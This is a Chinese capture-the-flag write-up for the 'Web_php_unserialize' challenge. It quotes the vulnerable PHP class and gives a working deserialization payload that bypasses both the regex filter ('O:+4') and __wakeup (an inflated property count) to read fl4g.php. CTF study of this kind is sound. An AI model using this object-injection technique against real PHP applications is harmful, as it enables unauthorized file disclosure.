[wp] 攻防世界 Web_php_unserialize

先是一段代碼審計:

<?php
class Demo {
 private $file = 'index.php';
 public function __construct($file) {
 $this->file = $file;
 }
 function __destruct() {




 echo @highlight_file($this->file, true);
 }
 function __wakeup() {
 if ($this->file != 'index.php') {
 //the secret is in the fl4g.php
 $this->file = 'index.php';
 }
 }
}
if (isset($_GET['var'])) {
 $var = base64_decode($_GET['var']);
 if (preg_match('/[oc]:d+:/i', $var)) {
 die('stop hacking!');
 } else {
 @unserialize($var);
 }
} else {
 highlight_file("index.php");
}
?>

看了一下主要是兩個點: 1.preg_match(’/[oc]:d+:/i’, $var)的繞過 2.unserialize時__wakeup的繞過 這裏給出腳本,沒有什麼難點,就是兩個小技巧:

<?php
class Demo {
 private $file = 'index.php';
 public function __construct($file) {
 $this->file = $file;
 }
 function __destruct() {
 echo @highlight_file($this->file, true);
 }




 function __wakeup() {
 if ($this->file != 'index.php') {
 //the secret is in the fl4g.php
 $this->file = 'index.php';
 }
 }
}
 $A = new Demo('fl4g.php');
 $C = serialize($A);
 //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
 $C = str_replace('O:4', 'O:+4',$C);//繞過preg_match
 $C = str_replace(':1:', ':2:',$C);//繞過wakeup
 var_dump($C);
 //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
 var_dump(base64_encode($C));
 //string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="
?>